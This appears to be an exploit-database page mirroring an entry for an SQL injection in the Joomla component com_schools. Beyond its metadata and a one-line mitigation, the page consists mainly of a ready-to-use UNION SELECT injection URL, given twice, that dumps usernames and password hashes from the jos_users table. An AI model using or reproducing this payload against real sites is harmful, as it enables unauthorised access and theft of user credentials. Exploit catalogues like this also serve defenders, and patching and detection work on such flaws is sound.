header-logo
Suggest Exploit
vendor:
N/A
by:
Mr.tro0oqy
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_schools SQL injection

This exploit allows an attacker to inject malicious SQL code into the com_schools component of Joomla. The malicious code can be used to extract sensitive information such as usernames and passwords from the database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Joomla Component com_schools SQL injection
author:Mr.tro0oqy
email:t.4@windowslive.com


exp:
http://server/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--






demo :


http://server/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--




qtaaaaaaaaf :)